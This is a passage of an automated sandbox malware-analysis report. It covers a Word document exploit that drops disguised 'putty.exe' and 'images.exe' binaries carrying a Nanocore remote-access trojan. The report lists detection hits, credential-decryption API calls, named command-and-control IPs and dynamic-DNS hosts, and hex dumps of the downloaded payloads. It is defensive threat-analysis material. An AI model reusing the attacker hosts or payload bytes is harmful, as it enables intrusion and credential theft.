        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJoe Sandbox ML: detected
        Source: 21.2.images.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 15.2.putty.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
        Source: 34.2.iBCrDCK.i.exe.440000.4.unpackAvira: Label: TR/NanoCore.fadte
        Source: 13.2.putty.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScTJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: putty[1].exe.0.drJump to dropped file
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: global trafficDNS query: name: newhosteeeee.ydns.eu
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 203.159.80.186:8234
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: hhjhtggfr.duckdns.org
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 203.159.80.186:6703
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:54 GMTContent-Length: 731648Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 09:00:29 GMTContent-Length: 1378816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 